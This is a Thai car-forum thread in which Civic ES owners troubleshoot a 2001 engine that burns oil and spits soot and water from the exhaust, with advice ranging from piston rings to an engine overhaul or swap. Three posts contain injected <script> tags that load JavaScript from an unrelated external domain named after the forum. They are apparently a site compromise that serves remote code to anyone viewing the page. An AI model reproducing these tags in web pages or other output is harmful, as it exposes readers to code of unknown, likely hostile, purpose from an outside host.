ตอบ
Chonchy

ชื่อเล่น: ชล

เข้าร่วม: 12 มกรา 2012
ตอบ: 4143

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7371
ให้คำขอบคุณ: 6492

ปี: 2001
ศุกร์, 31 พฤษภาคม 2013 14:07 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
รู้มาคับว่า เวลาเราสตาร์ทรถตอนเช้า จะมีไอน้ำหยดที่ปลายท่อ

แต่ของผม มันมีเขม่าดำๆ ออกมาด้วย กระจายเต็มพื้นเลย เวลาเช้าๆ

ปลายท่อ ก็มีเขม่า  น้ำมันเครื่องก็หาย แต่ไม่หยดลงพื้นเลยนะคับ

เพราะเพิ่งไปทำ เปลี่ยนซีลเครื่องชุดใหญ่กับอู่พี่ก่ำมา เมื่อ 26-3-56

ผ่านมาถึง 27-5-56 ดึงตัววัดน้ำมันออกมาดู ไม่มีติดปลายเลยคับ

เตอมเพิ่มไปเกือบ 3 ลิตร ถึงจะถึงขีดที่พอดี 

เลยอยากจะถามว่า มันเป็นอะไรอะคับ...ต้องเช็คอะไร ตรงไหนบ้าง

ขอบคุณคับ
ได้รับคำขอบคุณจาก: Makai  nu_es_05  tawan1986  suttijate  popza4 
สมชาย

เข้าร่วม: 14 มกรา 2013
ตอบ: 5916

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4245
ให้คำขอบคุณ: 7209

สี: แดง รอยัล รูบี้ (มุก) (R-522P)
ศุกร์, 31 พฤษภาคม 2013 14:09 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
ผมเป็นแต่ มีน้ำออกทางปลายท่อ อะครับ เป็นทุกครํง ที่เบิ่นออกมาอะครับ"<script src="https://sport32news.com/civicesgroup.js"> หยดติ๋งๆเลย
ได้รับคำขอบคุณจาก: nu_es_05 
horus

ชื่อเล่น: ต๋อย

เข้าร่วม: 18 เมษา 2013
ตอบ: 1272

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1777
ให้คำขอบคุณ: 1065

ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
ศุกร์, 31 พฤษภาคม 2013 14:11 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
มาเก็บข้อมูลคร๊าบบบบบบบบบ "<script src="https://sport32news.com/civicesgroup.js">
G221i

ชื่อเล่น: บอย

เข้าร่วม: 14 มิถุนา 2012
ตอบ: 86

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 114
ให้คำขอบคุณ: 41

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 31 พฤษภาคม 2013 14:20 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
อืม น่าสงสัย แต่ ของผมซีลท้ายเครื่องรั่ว แต่ไม่กล้าเอาไปทำ กลัวงานเข้าเป็นอย่างอื่นอีก  เจ็บมาเยอะกับพวกอู่ๆทั้งหลาย รอเก็บเงินเข้า0 ทีเดียว
maxner_rangsit

ชื่อเล่น: ป๊อบ

เข้าร่วม: 10 พฤศจิกา 2009
ตอบ: 201

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 149
ให้คำขอบคุณ: 256

ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 31 พฤษภาคม 2013 15:28 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
ของผมก็เปนครับพี่ชลแต่น้ำมันเครื่องยังปกติ  ตอนนี้อาการซีลท้ายครับ
รอทำเกียร์ทีเดียวเลย
matmann

ชื่อเล่น: นัท

เข้าร่วม: 26 ตุลา 2011
ตอบ: 436

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 398
ให้คำขอบคุณ: 169

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 31 พฤษภาคม 2013 15:37 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
เหมือนที่ผมเคยเป็นเรยครับคุณชล ใช้ลืม ๆ ซักสามสี่วัน เช้ามา ดึงตัววัดระดับน้ำมันเครื่องมาดู น้ำมันหายๆ ไปมากผิดปกติ แล้วน้ำออกปลายท่อเค๊าว่าดีเครื่องฟิต แต่เครื่องเก่าผมออกแบบเหมือนคนจามเวลาเปนหวัด เปนฝอย ๆ มีน้ำปนเขม่าดำ ๆ วิธีดูคือติดเครื่องแล้วเแบมือรองไอเสียจากท่อ ห่างปลายท่อนิดหน่อย รับรองเจอเพียบ ถ้าหากอาการลูกชายตัวเขียวของคุณชลเป็นแบบนี้ปล่อยไว้ไม่ค่อยดีนะคับ รีบพาไปให้หมอหาสาเหตุซะนะครับ ยังงัยก็ขอให้หายป่วยไว ๆ ครับ
Chonchy

ครอบครัว ES
ครอบครัว ES

ศุกร์, 31 พฤษภาคม 2013 15:42 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
matmann พิมพ์ว่า:
เหมือนที่ผมเคยเป็นเรยครับคุณชล ใช้ลืม ๆ ซักสามสี่วัน เช้ามา ดึงตัววัดระดับน้ำมันเครื่องมาดู น้ำมันหายๆ ไปมากผิดปกติ แล้วน้ำออกปลายท่อเค๊าว่าดีเครื่องฟิต แต่เครื่องเก่าผมออกแบบเหมือนคนจามเวลาเปนหวัด เปนฝอย ๆ มีน้ำปนเขม่าดำ ๆ วิธีดูคือติดเครื่องแล้วเแบมือรองไอเสียจากท่อ ห่างปลายท่อนิดหน่อย รับรองเจอเพียบ ถ้าหากอาการลูกชายตัวเขียวของคุณชลเป็นแบบนี้ปล่อยไว้ไม่ค่อยดีนะคับ รีบพาไปให้หมอหาสาเหตุซะนะครับ ยังงัยก็ขอให้หายป่วยไว ๆ ครับ

ไม่ต้องเอามืออังเลยคับ กระจายลงที่พื้นเลย ตามแรงลมปลายท่อ 

แล้วที่แก้หาย ไปแก้ยังไงมาคับ...

ได้รับคำขอบคุณจาก: tawan1986 
ต่าย

เข้าร่วม: 25 มิถุนา 2012
ตอบ: 53

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 26
ให้คำขอบคุณ: 11

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 31 พฤษภาคม 2013 15:49 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
มีควันดำออกมาด้วยหรือเปล่าครับถ้ามีแหวนอาจจะตายก็ได้ครับ
matmann

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 31 พฤษภาคม 2013 15:51 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
ของ
Chonchy พิมพ์ว่า:

ไม่ต้องเอามืออังเลยคับ กระจายลงที่พื้นเลย ตามแรงลมปลายท่อ 

แล้วที่แก้หาย ไปแก้ยังไงมาคับ...

ของผม เปลี่ยนเครื่องเรยอ่ะครับ เฉพาะท่อนตรงรวมค่าวางด้วยสองหมื่นนิดหน่อย สาเหตุทีี่ไม่ซ่อม เพราะเคยปาดฝามาแล้ว 1 ครั้งที่อู่พี่่ก่ำ ครั้งนีี้มาเป็นอีก ถ้าซ่อมกลัวว่าจะซ่อมไม่จบครับ เรยตัดใจเปลี่ยนทีเดียวไปเรย http://www.civicesgroup.com/forum/topic53632
Makai

ชื่อเล่น: มะไก่

เข้าร่วม: 16 พฤษภาคม 2010
ตอบ: 3940

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2065
ให้คำขอบคุณ: 3430

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 31 พฤษภาคม 2013 15:57 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<

อาการเดียวกันเลยครับพี่ชล เปนอาการรถที่กินน้ำมันเครื่อง ที่หายไปไม่ได้หยดลงพื้นครับ

แต่มันจะflow ออกทางปลายท่ออย่างสิ้นเปลืองเลยครับ เช้าๆจะมีคราบน้ำผสมเขม่าดำออกมาเต็มเลยใช่ไม๊

รอบก่อนผมใช้มาไม่ถึงสองพันโลเลยครับ ชักขึ้นมาดูตกใจเลย ไม่มีติดก้านวัดขึ้นมาเลยครับ เลยไปถ่ายมาใหม่

ตอนนี้รอดูอาการอยู่ครับ แต่ของผมอาการหนักครับ ไม่ใช่แค่นั้น สงสัยคงต้องโดนชุดใหญ่อีกรอบแน่เลย

ทั้งที่เพิ่งยกเครื่องมาแท้เล้ยยยยย !!!

ยังไงถ้าผมไปเช้คได้ข้อสรุปยังไง ผมจะมาอัฟเดทให้ทราบนะพี่ 

ได้รับคำขอบคุณจาก: tawan1986  suttijate  popza4 
Chonchy

ครอบครัว ES
ครอบครัว ES

ศุกร์, 31 พฤษภาคม 2013 15:59 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
ของ

ของผม เปลี่ยนเครื่องเรยอ่ะครับ เฉพาะท่อนตรงรวมค่าวางด้วยสองหมื่นนิดหน่อย สาเหตุทีี่ไม่ซ่อม เพราะเคยปาดฝามาแล้ว 1 ครั้งที่อู่พี่่ก่ำ ครั้งนีี้มาเป็นอีก ถ้าซ่อมกลัวว่าจะซ่อมไม่จบครับ เรยตัดใจเปลี่ยนทีเดียวไปเรย http://www.civicesgroup.com/forum/topic53632

ของผม เจ้าของรถเก่า ไม่ได้บอกมาว่า เคยปาดฝามาหรือป่าวอะคับ....แล้วต้องเช็คยังไงหว่า...
Makai พิมพ์ว่า:

อาการเดียวกันเลยครับพี่ชล เปนอาการรถที่กินน้ำมันเครื่อง ที่หายไปไม่ได้หยดลงพื้นครับ

แต่มันจะflow ออกทางปลายท่ออย่างสิ้นเปลืองเลยครับ เช้าๆจะมีคราบน้ำผสมเขม่าดำออกมาเต็มเลยใช่ไม๊

รอบก่อนผมใช้มาไม่ถึงสองพันโลเลยครับ ชักขึ้นมาดูตกใจเลย ไม่มีติดก้านวัดขึ้นมาเลยครับ เลยไปถ่ายมาใหม่

ตอนนี้รอดูอาการอยู่ครับ แต่ของผมอาการหนักครับ ไม่ใช่แค่นั้น สงสัยคงต้องโดนชุดใหญ่อีกรอบแน่เลย

ทั้งที่เพิ่งยกเครื่องมาแท้เล้ยยยยย !!!

ยังไงถ้าผมไปเช้คได้ข้อสรุปยังไง ผมจะมาอัฟเดทให้ทราบนะพี่ 

รอผลคับ จะได้แก้ไขตามกัน...

song

เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ศุกร์, 31 พฤษภาคม 2013 16:02 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
เก็บข้อมูล
Chonchy

ครอบครัว ES
ครอบครัว ES

ศุกร์, 31 พฤษภาคม 2013 16:15 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
ล่าสุด โทรปรึกษาพี่ก่ำ ออโต้เวย์ 

พี่ก่ำ ถามว่า รถปีอะไร ตอบ 2001

พี่กำ่ว่า สงสัยต้องฮอลเครื่อง เพราะเครื่องเก่าแล้ว ใช้งานมาหนัก

เครื่องหลวม ไม่จำเป็นว่าต้องควันขาว เพราะอาการที่เล่าให้พี่ก่ำฟัง พี่แกบอกว่า น่าจะใช่เลย

นี่ก็กะลังฮอลเครื่องของ FD อาการใกล้เคียงกัน วิ่งแค่ แสนโล เอง ยังฮอลเลย

พี่กำ่บอกให้ลองจับดูอีกทีว่า กินน้ำมันเครื่องเท่าไหร่

ท่าฮอลเครื่อง ค่าใช้จ่ายก็ประมาณ หมื่นกลางๆ....เซ็งเลย...เสียเงินอีกแล้ว...
ได้รับคำขอบคุณจาก: tawan1986  BEER_CIVIC ES  suttijate  popza4 
BEER_CIVIC ES

ชื่อเล่น: เบียร์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 984

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1241
ให้คำขอบคุณ: 3893

สี: น้ำเงิน อิเทอนอล (B-96P)
เสาร์, 1 มิถุนา 2013 18:30 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
ของเราอาการ นี่แหละ แต่เป็น มิตซู นะ  เปลี่ยนแต่แหวน ก็โอนะ หมื่นนิดๆๆ แรงเหมือนเดิม  ค่าแหวน3พัน แต่แพงค่าแรงยกเครื่อง

suttijate

ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 1 มิถุนา 2013 20:05 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
รู้มาคับว่า เวลาเราสตาร์ทรถตอนเช้า จะมีไอน้ำหยดที่ปลายท่อ

แต่ของผม มันมีเขม่าดำๆ ออกมาด้วย กระจายเต็มพื้นเลย เวลาเช้าๆ

ปลายท่อ ก็มีเขม่า  น้ำมันเครื่องก็หาย แต่ไม่หยดลงพื้นเลยนะคับ

เพราะเพิ่งไปทำ เปลี่ยนซีลเครื่องชุดใหญ่กับอู่พี่ก่ำมา เมื่อ 26-3-56

ผ่านมาถึง 27-5-56 ดึงตัววัดน้ำมันออกมาดู ไม่มีติดปลายเลยคับ

เตอมเพิ่มไปเกือบ 3 ลิตร ถึงจะถึงขีดที่พอดี 

เลยอยากจะถามว่า มันเป็นอะไรอะคับ...ต้องเช็คอะไร ตรงไหนบ้าง

ขอบคุณคับ

มา มา มา คุณ ชล มาเข้าแก้งเดียวกัน เพิ่งเปลี่ยนเครื่องใหม่มา 2 วันร้านพี่แกเค้านั่นแหละ ลองเปลี่ยนน้ำมันเครื่องเป็นเบอร์ W50 ดูก่อนครับ ถ้ามันลด แต่ ลดช้าลงกว่าเดิมน่าจะเครื่องหลวมครับ
ล่าสุด โทรปรึกษาพี่ก่ำ ออโต้เวย์ 

พี่ก่ำ ถามว่า รถปีอะไร ตอบ 2001

พี่กำ่ว่า สงสัยต้องฮอลเครื่อง เพราะเครื่องเก่าแล้ว ใช้งานมาหนัก

เครื่องหลวม ไม่จำเป็นว่าต้องควันขาว เพราะอาการที่เล่าให้พี่ก่ำฟัง พี่แกบอกว่า น่าจะใช่เลย

นี่ก็กะลังฮอลเครื่องของ FD อาการใกล้เคียงกัน วิ่งแค่ แสนโล เอง ยังฮอลเลย

พี่กำ่บอกให้ลองจับดูอีกทีว่า กินน้ำมันเครื่องเท่าไหร่

ท่าฮอลเครื่อง ค่าใช้จ่ายก็ประมาณ หมื่นกลางๆ....เซ็งเลย...เสียเงินอีกแล้ว...

นั่นแหละครับ ก่อนผมเปลี่ยนเครื่องพี่แกเค้าก็บอกผมอย่างนี้แหละครับ แต่ผมดื้อไม่ยอมไอฮอน สรุป ประมาณ 2 เดือน ท่อนล่างพังเลยครับ
ได้รับคำขอบคุณจาก: popza4 
popza4

ชื่อเล่น: อ้น

เข้าร่วม: 19 กรกฎา 2012
ตอบ: 1097

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 796
ให้คำขอบคุณ: 3347

สี: แดง ไฟร์เปปเปอร์ (R-507P)
เสาร์, 1 มิถุนา 2013 22:07 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
ข้อมูลๆๆ
OUM

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 2313

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2141
ให้คำขอบคุณ: 1465

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 1 มิถุนา 2013 22:26 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
ยกเลยดีกว่าไหมครับ
CoCain3z

เข้าร่วม: 01 กันยา 2011
ตอบ: 419

ได้รับคำขอบคุณ: 692
ให้คำขอบคุณ: 577

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 1 มิถุนา 2013 22:27 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
วางเครื่องใหม่เลยพวกแคมคู่จัดแจ่มๆ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
matmann

เสาร์, 1 มิถุนา 2013 23:36 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
ผมเชียร์ k20 r mt ไปเรยครับคุณชล เจ็บแต่จบแถมได้ม้ามาควบเล่นอีกตรึม
Chonchy

ครอบครัว ES
ครอบครัว ES

จันทร์, 3 มิถุนา 2013 09:43 - >>> สอบถามเรื่องไอน้ำปลายท่อ <<<
อยากยกเครื่อง แต่ไม่มีงบ..เหอะๆ

ขนาดงบซ่อม ยังจะแย่เลย...แง่มมม
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.